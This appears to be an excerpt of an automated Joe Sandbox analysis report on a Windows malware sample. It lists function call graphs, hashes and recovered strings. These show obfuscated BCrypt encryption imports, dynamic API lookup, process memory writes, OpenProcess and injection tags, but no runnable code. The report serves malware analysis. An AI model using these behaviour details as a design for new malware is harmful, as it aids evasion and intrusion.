7ff73cfc4545 4124->4126 4125->4126 4127 7ff73cfc57fc SetUnhandledExceptionFilter 4128 7ff73cfc2f10 4129 7ff73cfc2f70 4128->4129 4130 7ff73cfc1380 15 API calls 4129->4130 4139 7ff73cfc3056 4129->4139 4131 7ff73cfc2fac 4130->4131 4132 7ff73cfc1170 11 API calls 4131->4132 4131->4139 4133 7ff73cfc2fdb 4132->4133 4134 7ff73cfc1170 11 API calls 4133->4134 4133->4139 4135 7ff73cfc300e 4134->4135 4135->4139 4140 7ff73cfc3074 4135->4140 4138 7ff73cfc3074 17 API calls 4138->4139 4141 7ff73cfc30b1 GetModuleHandleW GetProcAddress 4140->4141 4143 7ff73cfc30fc 4141->4143 4144 7ff73cfc3032 4143->4144 4145 7ff73cfc1170 11 API calls 4143->4145 4144->4138 4144->4139 4146 7ff73cfc3122 4145->4146 4147 7ff73cfc3246 LocalFree 4146->4147 4148 7ff73cfc1170 11 API calls 4146->4148 4147->4144 4149 7ff73cfc314b 4148->4149 4149->4147 4150 7ff73cfc1170 11 API calls 4149->4150 4151 7ff73cfc316d 4150->4151 4151->4147 4152 7ff73cfc1170 11 API calls 4151->4152 4153 7ff73cfc319c 4152->4153 4153->4147 4154 7ff73cfc31b3 GetModuleHandleW GetProcAddress 4153->4154 4155 7ff73cfc31e1 4154->4155 4155->4147 4156 7ff73cfc1170 11 API calls 4155->4156 4158 7ff73cfc3207 LocalFree 4156->4158 4158->4147 4159 7ff73cfc2c54 4160 7ff73cfc2ce0 4159->4160 4163 7ff73cfc2c64 4159->4163 4161 7ff73cfc2cda FreeLibrary 4161->4160 4162 7ff73cfc2c93 LocalFree 4164 7ff73cfc2cac LocalFree 4162->4164 4163->4161 4163->4162 4164->4161 4166 7ff73cfc41d4 4167 7ff73cfc4130 __initmbctable 62 API calls 4166->4167 4168 7ff73cfc41fa 4167->4168 4169 7ff73cfc4201 4168->4169 4174 7ff73cfc4233 4168->4174 4170 7ff73cfc5798 _errno 62 API calls 4169->4170 4171 7ff73cfc4206 4170->4171 4172 7ff73cfc5730 _invalid_parameter_noinfo 17 API calls 4171->4172 4175 7ff73cfc4211 4172->4175 4173 7ff73cfc5460 64 API calls 4173->4174 4174->4173 4174->4175 4176 7ff73cfc85cc 4177 7ff73cfc7520 __onexitinit 62 API calls 4176->4177 4178 7ff73cfc85df EncodePointer 4177->4178 4179 7ff73cfc85fe 4178->4179 4180 7ff73cfc918e 4183 7ff73cfc731c LeaveCriticalSection 4180->4183

                                                                      Executed Functions

                                                                      Function 00007FF73CFC1864 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51nativelibrarymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3225137318-3502785670
                                                                      • Opcode ID: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                                                      • Instruction ID: 642c1ce69bf535c4ed5d2c289370d00c663158fc13c76701510719361067d5f6
                                                                      • Opcode Fuzzy Hash: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                                                      • Instruction Fuzzy Hash: 0B11BF73B18A5392EB04AB25E844669A2E1FB88BC0F88D531DE8D83764DE3DE855C310
                                                                      Function 00007FF73CFC214C Relevance: 4.6, APIs: 3, Instructions: 79nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess$InformationQuery
                                                                      • String ID:
                                                                      • API String ID: 4257070689-0
                                                                      • Opcode ID: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                                                      • Instruction ID: c4b0b3250ecf29fa021463758f52b7787629e1f85056e6fdef458fab04fd036d
                                                                      • Opcode Fuzzy Hash: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                                                      • Instruction Fuzzy Hash: CE31AE37B04B53AAEB249F51A840AAD73A4FB04B98F818435DE8D13764DF38E85AD350
                                                                      Function 00007FF73CFC2A34 Relevance: 49.1, APIs: 11, Strings: 17, Instructions: 98libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                                      • String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
                                                                      • API String ID: 384173800-2409299874
                                                                      • Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                                                      • Instruction ID: b26cd41a195b04f3a5d691c89cc596cbbd671d42bcd6b6c3267a5cb3bd6863fe
                                                                      • Opcode Fuzzy Hash: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                                                      • Instruction Fuzzy Hash: 7C51B477E49A03AAFB10EF60E848178B3F4FB44748F948539D98C96668DF3CA545A720
                                                                      Function 00007FF73CFC1170 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 139libraryloaderinjectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
                                                                      • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                                                      • API String ID: 1117553398-482538141
                                                                      • Opcode ID: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                                                      • Instruction ID: 5b81bfe6033a5d141ee013ae635d67b9cd1e072114eb9b659379601595639741
                                                                      • Opcode Fuzzy Hash: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                                                      • Instruction Fuzzy Hash: 90512A77B08A43A2EB10BF16E850579A3A1FB88BD4B94D531DA8E83B54CF3EE455D310
                                                                      Function 00007FF73CFC196C Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 389libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 51 7ff73cfc196c-7ff73cfc19d1 52 7ff73cfc1e78-7ff73cfc1e89 call 7ff73cfc214c 51->52 53 7ff73cfc19d7-7ff73cfc19d9 51->53 63 7ff73cfc1ee1-7ff73cfc1eed 52->63 64 7ff73cfc1e8b-7ff73cfc1e93 52->64 55 7ff73cfc19df-7ff73cfc19e1 53->55 56 7ff73cfc1bd8-7ff73cfc1bf3 call 7ff73cfc214c 53->56 59 7ff73cfc1b3a-7ff73cfc1b5c call 7ff73cfc1624 55->59 60 7ff73cfc19e7-7ff73cfc19e9 55->60 69 7ff73cfc1f6e-7ff73cfc1f83 56->69 71 7ff73cfc1bf9-7ff73cfc1c25 call 7ff73cfc1170 56->71 59->69 77 7ff73cfc1b62-7ff73cfc1b66 59->77 65 7ff73cfc19f5-7ff73cfc1a0a call 7ff73cfc1864 60->65 66 7ff73cfc19eb-7ff73cfc19f0 60->66 68 7ff73cfc1eef-7ff73cfc1ef1 63->68 63->69 72 7ff73cfc1ed1-7ff73cfc1edc 64->72 65->69 79 7ff73cfc1a10-7ff73cfc1a28 65->79 66->69 68->69 76 7ff73cfc1ef3-7ff73cfc1f08 call 7ff73cfc214c 68->76 71->69 88 7ff73cfc1c2b-7ff73cfc1c3e 71->88 74 7ff73cfc1e95-7ff73cfc1e97 72->74 75 7ff73cfc1ede 72->75 74->75 84 7ff73cfc1e99-7ff73cfc1ecd call 7ff73cfc1f84 74->84 75->63 76->69 91 7ff73cfc1f0a-7ff73cfc1f11 76->91 81 7ff73cfc1bd1-7ff73cfc1bd3 77->81 82 7ff73cfc1b68 77->82 79->69 85 7ff73cfc1a2e-7ff73cfc1a3d 79->85 81->69 87 7ff73cfc1b6c-7ff73cfc1b6e 82->87 84->72 90 7ff73cfc1a44-7ff73cfc1a46 85->90 87->81 92 7ff73cfc1b70-7ff73cfc1b8f 87->92 93 7ff73cfc1d1e-7ff73cfc1d21 88->93 90->69 95 7ff73cfc1a4c-7ff73cfc1a70 90->95 96 7ff73cfc1f5e-7ff73cfc1f69 91->96 97 7ff73cfc1b91-7ff73cfc1bc3 call 7ff73cfc4104 RtlInitUnicodeString call 7ff73cfc1f84 92->97 98 7ff73cfc1bc5-7ff73cfc1bcf 92->98 99 7ff73cfc1c43-7ff73cfc1c45 93->99 100 7ff73cfc1d27-7ff73cfc1d2c 93->100 104 7ff73cfc1b21-7ff73cfc1b2f 95->104 105 7ff73cfc1a76-7ff73cfc1a90 95->105 101 7ff73cfc1f13-7ff73cfc1f15 96->101 102 7ff73cfc1f6b 96->102 97->98 98->81 98->87 99->100 107 7ff73cfc1c4b-7ff73cfc1c72 call 7ff73cfc1170 99->107 100->69 108 7ff73cfc1d32-7ff73cfc1d40 call 7ff73cfc214c 100->108 101->102 112 7ff73cfc1f17-7ff73cfc1f5a call 7ff73cfc1f84 101->112 102->69 104->90 109 7ff73cfc1b35 104->109 110 7ff73cfc1a92-7ff73cfc1ac4 GetModuleHandleW GetProcAddress 105->110 111 7ff73cfc1ae5-7ff73cfc1ae8 105->111 126 7ff73cfc1d16-7ff73cfc1d1a 107->126 127 7ff73cfc1c78-7ff73cfc1ccb GetModuleHandleW GetProcAddress 107->127 121 7ff73cfc1d45-7ff73cfc1d47 108->121 109->69 110->111 129 7ff73cfc1ac6-7ff73cfc1ad2 110->129 117 7ff73cfc1b1a 111->117 118 7ff73cfc1aea-7ff73cfc1b14 RtlInitUnicodeString LocalFree 111->118 112->96 117->104 118->117 121->69 122 7ff73cfc1d4d-7ff73cfc1d7b call 7ff73cfc1170 121->122 122->69 137 7ff73cfc1d81-7ff73cfc1d90 122->137 126->93 127->126 136 7ff73cfc1ccd-7ff73cfc1cf2 call 7ff73cfc1170 127->136 129->111 134 7ff73cfc1ad4-7ff73cfc1ae3 129->134 134->111 134->134 143 7ff73cfc1cf4-7ff73cfc1cf9 call 7ff73cfc1f84 136->143 144 7ff73cfc1d0b-7ff73cfc1d10 LocalFree 136->144 139 7ff73cfc1e6a-7ff73cfc1e6d 137->139 141 7ff73cfc1d95-7ff73cfc1d97 139->141 142 7ff73cfc1e73 139->142 141->102 145 7ff73cfc1d9d-7ff73cfc1dc2 call 7ff73cfc1170 141->145 142->102 148 7ff73cfc1cfe-7ff73cfc1d09 143->148 144->126 150 7ff73cfc1e63-7ff73cfc1e66 145->150 151 7ff73cfc1dc8-7ff73cfc1e19 GetModuleHandleW GetProcAddress 145->151 148->144 150->139 151->150 154 7ff73cfc1e1b-7ff73cfc1e3f call 7ff73cfc1170 151->154 157 7ff73cfc1e41-7ff73cfc1e56 call 7ff73cfc1f84 154->157 158 7ff73cfc1e58-7ff73cfc1e5d LocalFree 154->158 157->158 158->150
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 979628613-3502785670
                                                                      • Opcode ID: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                                                      • Instruction ID: 7d77f187ad5e88883962f504635f8acc33324cf6101fd662e7f8a24b026550ad
                                                                      • Opcode Fuzzy Hash: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                                                      • Instruction Fuzzy Hash: D8025137B09B4796EB60EB15E4406AAB3E4FB84794F808531EA8D43B98EF3DE514D710
                                                                      Function 00007FF73CFC2CE8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 84libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                                                      • API String ID: 1646373207-1761306045
                                                                      • Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                                                      • Instruction ID: d4eaad26785371be0655d1bdaebfe88e7b9824cb45a7231b602812d7de3a5eb6
                                                                      • Opcode Fuzzy Hash: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                                                      • Instruction Fuzzy Hash: A4410637B08A43A2FB00AB15F848665A3E0FF84799FC05431C98C47668DF3DE54AE724
                                                                      Function 00007FF73CFC36D8 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 222libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 178 7ff73cfc36d8-7ff73cfc371d call 7ff73cfc326c 180 7ff73cfc3722-7ff73cfc372a 178->180 181 7ff73cfc3730-7ff73cfc3751 180->181 182 7ff73cfc3a63-7ff73cfc3a7c 180->182 183 7ff73cfc3753-7ff73cfc375a 181->183 184 7ff73cfc375c-7ff73cfc3761 181->184 187 7ff73cfc37a3-7ff73cfc37ad 183->187 185 7ff73cfc3763-7ff73cfc376a 184->185 186 7ff73cfc376c-7ff73cfc3771 184->186 185->187 188 7ff73cfc3773-7ff73cfc377a 186->188 189 7ff73cfc377c-7ff73cfc3781 186->189 190 7ff73cfc37bf-7ff73cfc37da 187->190 191 7ff73cfc37af-7ff73cfc37b9 187->191 188->187 192 7ff73cfc3783-7ff73cfc378a 189->192 193 7ff73cfc378c-7ff73cfc379f 189->193 195 7ff73cfc37f1-7ff73cfc37f6 190->195 196 7ff73cfc37dc-7ff73cfc37ec call 7ff73cfc1170 190->196 191->190 194 7ff73cfc37bb 191->194 192->187 193->187 194->190 195->182 198 7ff73cfc37fc 195->198 196->195 199 7ff73cfc3803-7ff73cfc3851 GetModuleHandleW GetProcAddress 198->199 201 7ff73cfc3a54-7ff73cfc3a59 199->201 202 7ff73cfc3857-7ff73cfc386e call 7ff73cfc1170 199->202 201->199 204 7ff73cfc3a5f 201->204 206 7ff73cfc3874-7ff73cfc3882 202->206 207 7ff73cfc3a4a-7ff73cfc3a4e LocalFree 202->207 204->182 208 7ff73cfc3a3a-7ff73cfc3a44 206->208 207->201 208->207 209 7ff73cfc3887-7ff73cfc3889 208->209 209->207 210 7ff73cfc388f-7ff73cfc38a2 call 7ff73cfc1170 209->210 210->207 213 7ff73cfc38a8-7ff73cfc3989 call 7ff73cfc224c * 3 call 7ff73cfc1170 210->213 222 7ff73cfc39dd-7ff73cfc39f6 call 7ff73cfc3ae8 213->222 223 7ff73cfc398b-7ff73cfc39c7 GetModuleHandleW GetProcAddress 213->223 228 7ff73cfc39f8 LocalFree 222->228 229 7ff73cfc39fe-7ff73cfc3a09 222->229 223->222 227 7ff73cfc39c9-7ff73cfc39d8 call 7ff73cfc1170 223->227 227->222 228->229 231 7ff73cfc3a11-7ff73cfc3a1c 229->231 232 7ff73cfc3a0b LocalFree 229->232 233 7ff73cfc3a24-7ff73cfc3a2b 231->233 234 7ff73cfc3a1e LocalFree 231->234 232->231 235 7ff73cfc3a33-7ff73cfc3a37 233->235 236 7ff73cfc3a2d LocalFree 233->236 234->233 235->208 236->235
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$CreateMemoryProcessWrite
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 2588141871-3502785670
                                                                      • Opcode ID: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                                                      • Instruction ID: 81b307a87e68c7207a41a6a020432c03b67ed1ddc2d715322ee6e31d9193f0db
                                                                      • Opcode Fuzzy Hash: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                                                      • Instruction Fuzzy Hash: 81B11B77B09A07AAEB50EB64E4802AC73F5FB48788F808535DA8D43758DE3CE519D760
                                                                      Function 00007FF73CFC2348 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70memorysleepfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                                                      • String ID: GetLastError$kernel32
                                                                      • API String ID: 2144717574-498319287
                                                                      • Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                                                      • Instruction ID: 2d939a36748c36a7dc8dd35ce287404ed5328be4ec8d01d8b704ad2887a5ad4f
                                                                      • Opcode Fuzzy Hash: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                                                      • Instruction Fuzzy Hash: F0314333B0864392E750EF25E404769B3E0FB84BA4F948B34D6AD476A4DF7CE4499720
                                                                      Function 00007FF73CFC1F84 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
                                                                      • String ID: LocalAlloc$kernel32
                                                                      • API String ID: 3806729184-3502785670
                                                                      • Opcode ID: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                                                      • Instruction ID: dee459a5ebd42db48f0cc0f75eed7299cb71da4074f5bb01a4b0bd3374f101b6
                                                                      • Opcode Fuzzy Hash: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                                                      • Instruction Fuzzy Hash: 7F411C37B45B07AAEB10EF60D4445A8B3B4FB44B88B848835CE4D43B59EF38E559D390
                                                                      Function 00007FF73CFC43C4 Relevance: 15.1, APIs: 10, Instructions: 87COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1720156084.00007FF73CFC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF73CFC0000, based on PE: true
                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                                                      • String ID:
                                                                      • API String ID: 2949660345-0
                                                                      • Opcode ID: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                                                      • Instruction ID: 66ec862500ea65597d1face5cd037cef20b3133c62304c94a135b9428817a094
                                                                      • Opcode Fuzzy Hash: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                                                      • Instruction Fuzzy Hash: 5B310C23F0C603A6FA54BBA094412B9E6D1AF90744FD0CC39DADE462D7DE2CB440B671
                                                                      Function 00007FF73CFC326C Relevance: 13.7, APIs: 9, Instructions: 220fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 334 7ff73cfc326c-7ff73cfc32ce 335 7ff73cfc32d4-7ff73cfc32e7 call 7ff73cfc2a34 334->335 336 7ff73cfc35eb-7ff73cfc35fe 334->336 335->336 338 7ff73cfc32ed-7ff73cfc32f7 335->338 339 7ff73cfc3325-7ff73cfc3359 RtlInitUnicodeString call 7ff73cfc1864 338->339 340 7ff73cfc32f9-7ff73cfc3320 CreateFileW 338->340 345 7ff73cfc335e-7ff73cfc3360 339->345 341 7ff73cfc33ac-7ff73cfc33b2 340->341 343 7ff73cfc3578 341->343 344 7ff73cfc33b8-7ff73cfc33bc 341->344 346 7ff73cfc357f-7ff73cfc3582 343->346 344->343 347 7ff73cfc33c2-7ff73cfc33d9 call 7ff73cfc1000 344->347 345->343 348 7ff73cfc3366-7ff73cfc3370 345->348 349 7ff73cfc3584-7ff73cfc3588 346->349 350 7ff73cfc35d8-7ff73cfc35e8 CloseHandle 346->350 347->343 360 7ff73cfc33df-7ff73cfc33ea 347->360 352 7ff73cfc337e-7ff73cfc3389 call 7ff73cfc1920 348->352 353 7ff73cfc35c2-7ff73cfc35c6 LocalFree 349->353 354 7ff73cfc358a-7ff73cfc358c 349->354 350->336 362 7ff73cfc3372-7ff73cfc3374 352->362 363 7ff73cfc338b-7ff73cfc3397 LocalFree 352->363 361 7ff73cfc35cc-7ff73cfc35d5 LocalFree 353->361 358 7ff73cfc3599-7ff73cfc35a0 354->358 359 7ff73cfc358e-7ff73cfc3590 354->359 358->361 365 7ff73cfc35a2-7ff73cfc35ac 358->365 359->353 364 7ff73cfc3592-7ff73cfc3595 359->364 366 7ff73cfc3463-7ff73cfc3482 360->366 367 7ff73cfc33ec-7ff73cfc3400 call 7ff73cfc1624 360->367 361->350 362->363 374 7ff73cfc3376-7ff73cfc337b 362->374 363->343 368 7ff73cfc339d-7ff73cfc33a6 OpenProcess 363->368 364->361 370 7ff73cfc3597 364->370 371 7ff73cfc35b4-7ff73cfc35b7 365->371 372 7ff73cfc35ae UnmapViewOfFile 365->372 369 7ff73cfc3489-7ff73cfc348c 366->369 380 7ff73cfc3402-7ff73cfc3429 367->380 381 7ff73cfc3448-7ff73cfc3461 367->381 368->341 369->346 375 7ff73cfc3492-7ff73cfc34a7 369->375 370->353 371->353 376 7ff73cfc35b9-7ff73cfc35bc CloseHandle 371->376 372->371 374->352 378 7ff73cfc34b4 375->378 379 7ff73cfc34a9-7ff73cfc34b2 375->379 376->353 382 7ff73cfc34be-7ff73cfc34d2 call 7ff73cfc196c 378->382 379->378 379->382 383 7ff73cfc343e-7ff73cfc3446 380->383 384 7ff73cfc342b-7ff73cfc342f 380->384 381->369 382->343 388 